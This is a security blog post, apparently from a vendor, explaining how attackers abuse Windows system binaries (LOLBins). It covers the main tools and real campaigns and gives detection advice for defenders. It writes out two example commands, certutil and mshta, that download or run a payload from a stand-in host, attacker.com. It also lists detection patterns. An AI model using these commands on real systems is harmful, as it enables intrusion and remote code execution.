A security team investigates a breach. They scan for malware. Nothing. They check for unauthorized software. Clean. Every process that ran during the attack was a legitimate, Microsoft-signed binary that ships with Windows.
That's Living off the Land in action. No malware needed. The operating system itself becomes the weapon.
What Are LOLBins?
LOLBins, short for Living off the Land Binaries, are legitimate system tools that attackers repurpose for malicious activity. They're pre-installed, digitally signed, and trusted by most security solutions. That's exactly what makes them dangerous.
Why upload a custom tool that might trigger antivirus when certutil.exe can download your payload just fine? Why write a dropper when mshta.exe can execute remote scripts natively?
The LOLBAS project currently documents over 200 Windows binaries, scripts, and libraries that can be abused this way. MITRE ATT&CK tracks these techniques under multiple categories, most notably T1218 (System Binary Proxy Execution).
The Most Abused LOLBins
certutil.exe - Built for certificate management. Attackers use it to download files and encode payloads. It bypasses most web filters because it's not a browser.
certutil -urlcache -split -f http://attacker.com/payload.exe C:\temp\payload.exe
mshta.exe - Runs HTML Applications. One command executes remote scripts without anything touching the disk. Used by APT32 and FIN7.
mshta http://attacker.com/malicious.hta
regsvr32.exe - Registers COM objects. The "Squiblydoo" technique uses it to execute remote scriptlets, bypassing AppLocker without admin privileges.
rundll32.exe - Loads DLL files. Attackers abuse it to proxy execution through trusted binaries or run JavaScript directly.
PowerShell - Not a traditional LOLBin, but the most powerful living-off-the-land tool available. Deep Windows API integration makes it capable of downloading payloads, executing code in memory, credential harvesting, and lateral movement.
| Binary | Legitimate Purpose | Attacker Use |
|---|---|---|
bitsadmin.exe |
Background file transfers | Stealthy payload downloads |
wmic.exe |
System management | Remote code execution |
msiexec.exe |
Installer packages | Execute remote MSI payloads |
forfiles.exe |
Batch file processing | Command execution bypass |
Why Traditional Security Misses Them
Most security tools rely on signature detection and reputation scoring. LOLBins break both.
Signatures look for known malicious files. LOLBins are legitimate. Reputation scoring flags unknown executables. LOLBins have the highest possible reputation. Application whitelisting (AppLocker, WDAC) can block unauthorized software, but you can't block certutil.exe or powershell.exe without breaking legitimate workflows.
Your security stack watches the front door while attackers walk through the house using keys that were already on the table.
Real-World Campaigns
Volt Typhoon (2023-2024) - This Chinese state-sponsored group compromised US critical infrastructure using almost exclusively LOLBins. netsh, certutil, wmic, PowerShell. No custom malware. CISA issued a specific advisory because their living-off-the-land approach made them nearly invisible.
APT29 / Cozy Bear - The SolarWinds attackers used rundll32.exe to load their SUNBURST backdoor and relied on built-in Windows tools for post-exploitation.
Raspberry Robin (2022-2024) - This worm spreads via USB drives and uses msiexec.exe to fetch payloads. It chains multiple LOLBins together, making each step look benign while the attack progresses.
How to Detect and Defend
You can't block these tools. You can watch them closely.
- Enable command-line logging. Windows Event ID 4688 and PowerShell Script Block Logging (4104) are non-negotiable. The binary is legitimate, but the arguments tell the story.
- Monitor process relationships.
certutil.exelaunched by a certificate tool is expected.certutil.exespawned byoutlook.exeafter opening an attachment is a red flag. - Build SIEM rules for abuse patterns. Flag
certutilwith-urlcache,mshtaaccessing external URLs,regsvr32loading remote scriptlets, any LOLBin spawned from Office applications. - Deploy ASR rules. Microsoft's Attack Surface Reduction rules specifically target LOLBin abuse paths: blocking Office apps from creating child processes, blocking script execution from downloaded content.
- Audit continuously. Gaps in logging, missing EDR coverage, and overly permissive execution policies all create space for LOLBin abuse. SecValley's CSPM platform continuously assesses your Microsoft environment's security posture, surfacing the configuration gaps that make living-off-the-land techniques possible.
The Bottom Line
Attackers don't need to bring their own tools when yours work just fine. LOLBins turn trusted system utilities into attack infrastructure. No signatures to detect. No reputation flags to trigger. Just normal-looking processes doing abnormal things.
Your operating system is already full of weapons. The question is whether you're watching who picks them up.
